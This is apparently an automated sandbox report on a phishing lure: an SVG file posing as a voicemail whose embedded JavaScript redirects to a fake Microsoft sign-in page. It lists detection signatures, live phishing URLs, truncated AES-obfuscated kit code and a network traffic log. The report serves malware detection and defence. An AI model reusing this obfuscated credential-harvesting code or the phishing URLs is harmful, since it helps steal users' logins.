Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg

Overview

General Information

Sample name:#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg
renamed because original name is a hash value
Original sample name:Voicemailjsisler@sweepingcorp.com.svg
Analysis ID:1636750
MD5:a791e19357f1015af1b8816e5b743087
SHA1:e455a0b82d5f1ddaea8f3246a1efb55d7adb0b97
SHA256:28bb935c95745afb3390b709c03f9840fc09a7e5e56e4b7e1d9036e0e0b1f095
Infos:

Detection

Gabagool
Score:80
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected Gabagool
AI detected suspicious Javascript
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Javascript checks online IP of machine
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 7948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,7418917361889980763,10513141320866540213,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 8564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
#U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    1.8.pages.csvJoeSecurity_GabagoolYara detected GabagoolJoe Security
      1.6.pages.csvJoeSecurity_GabagoolYara detected GabagoolJoe Security
        1.7.pages.csvJoeSecurity_GabagoolYara detected GabagoolJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: https://kindianstreetfood.com/rrr/Avira URL Cloud: Label: phishing
          Source: https://kindianstreetfood.com/favicon.icoAvira URL Cloud: Label: phishing

          Phishing

          barindex
          AI detected phishing page
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'kindianstreetfood.com' does not match the legitimate domain for Microsoft., The domain 'kindianstreetfood.com' appears unrelated to Microsoft and suggests a different business focus, likely a restaurant or food service., There are no indicators in the URL that suggest a legitimate association with Microsoft., The presence of a Microsoft brand name with an unrelated domain is a common phishing tactic. DOM: 1.6.pages.csv
          Yara detected Gabagool
          Source: Yara matchFile source: 1.8.pages.csv, type: HTML
          Source: Yara matchFile source: 1.6.pages.csv, type: HTML
          Source: Yara matchFile source: 1.7.pages.csv, type: HTML
          AI detected suspicious Javascript
          Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/%23U25b6%23Ufe0fVoi... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and potentially collect sensitive information, which is a clear indication of malicious intent.
          Source: 1.18.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. It appears to be a malicious script attempting to collect sensitive information and potentially execute further malicious actions.
          Source: 1.51..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kindianstreetfood.com/rrr/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script decrypts and executes remote content, which could potentially lead to the execution of malicious code. Additionally, it sends sensitive data (such as the 'usuuid' parameter) to an external server. The use of obfuscated strings and URLs further increases the risk. While the script may have a legitimate purpose, the overall risk level is high due to the presence of these concerning behaviors.
          HTML page contains hidden URLs
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: https://wicked.bigpoliceman.com
          HTML page contains suspicious javascript code
          Source: https://kindianstreetfood.com/rrr/HTTP Parser: window.location.href = atob(
          Yara detected JavaScript embedded in SVG
          Source: Yara matchFile source: #U25b6#Ufe0fVoicemailjsisler@sweepingcorp.com.svg, type: SAMPLE
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: Number of links: 0
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: Total embedded image size: 45708
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: Base64 decoded: https://wicked.bigpoliceman.com
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: Title: Account sign in does not match URL
          Source: https://kindianstreetfood.com/rrr/HTTP Parser: let current_ip = null;function naksl6zj(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "2zvvsbn8pu7civuj5p8u7nm0t1qsf+l6pxhsiudzsacqthftqks7iov/i3gllmem5sclbvfoq8atpvp+mwxaha==";async function ojyub() { try { const response = await fetch("http...
          Source: https://kindianstreetfood.com/rrr/HTTP Parser: let usuuid = "2zvvsbn8pu7civuj5p8u7nm0t1qsf+l6pxhsiudzsacqthftqks7iov/i3gllmem5sclbvfoq8atpvp+mwxaha=="; let policy = "gl/ifhtzhkkwp1+z39rgvzoa8vdl2whfusaf8idxovolww/zapelg9zfuiruw0dp"; let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.parse(key), { iv: iv, ...
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: <input type="password" .../> found
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No favicon
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No <meta name="author".. found
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No <meta name="author".. found
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No <meta name="author".. found
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No <meta name="copyright".. found
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No <meta name="copyright".. found
          Source: https://kindianstreetfood.com/rrr/#UanNpc2xlckBzd2VlcGluZ2NvcnAuY29tHTTP Parser: No <meta name="copyright".. found
          Source: global trafficTCP traffic: 192.168.2.4:55490 -> 1.1.1.1:53
          Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
          Source: Joe Sandbox ViewIP Address: 95.101.182.65 95.101.182.65
          Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
          Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /rrr/ HTTP/1.1Host: kindianstreetfood.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=91f82733ee52f859&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: kindianstreetfood.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kindianstreetfood.com/rrr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=391f5a2ae398f12590981887d72b506c; cookie_test=test; js_enabled=true
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91f82733ee52f859/1741833492490/LL_10geG9GnlWBe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/91f82733ee52f859/1741833492491/37b45b0d0c9fe727c78cf8d28723f69ac7146a41a2e1508f4b311d4f9959da0d/hg3ym5R4LMLAb6D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/a66ll/0x4AAAAAABAFlOnWuZQ7ePKv/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/91f82733ee52f859/1741833492490/LL_10geG9GnlWBe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/570593096:1741829356:PhCNM-6kz2lV6HRsRphjeo5kJCAu4Jn7jqK5hS8mDrM/91f82733ee52f859/WuS3.S6KIdJNgvhLTtH_j5wb5BxqBoQSXQOpo1Jmmg4-1741833485-1.1.1.1-MBoboxuaZC0tZLADIr9lLS9QYxeY1VmhddzFO3C7Npp84kewh0EodxNh4Cj0JRC5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rrr/ HTTP/1.1Host: kindianstreetfood.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://kindianstreetfood.com/rrr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=391f5a2ae398f12590981887d72b506c; cookie_test=test; js_enabled=true
          Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://kindianstreetfood.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
          Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: kindianstreetfood.com
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: wicked.bigpoliceman.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
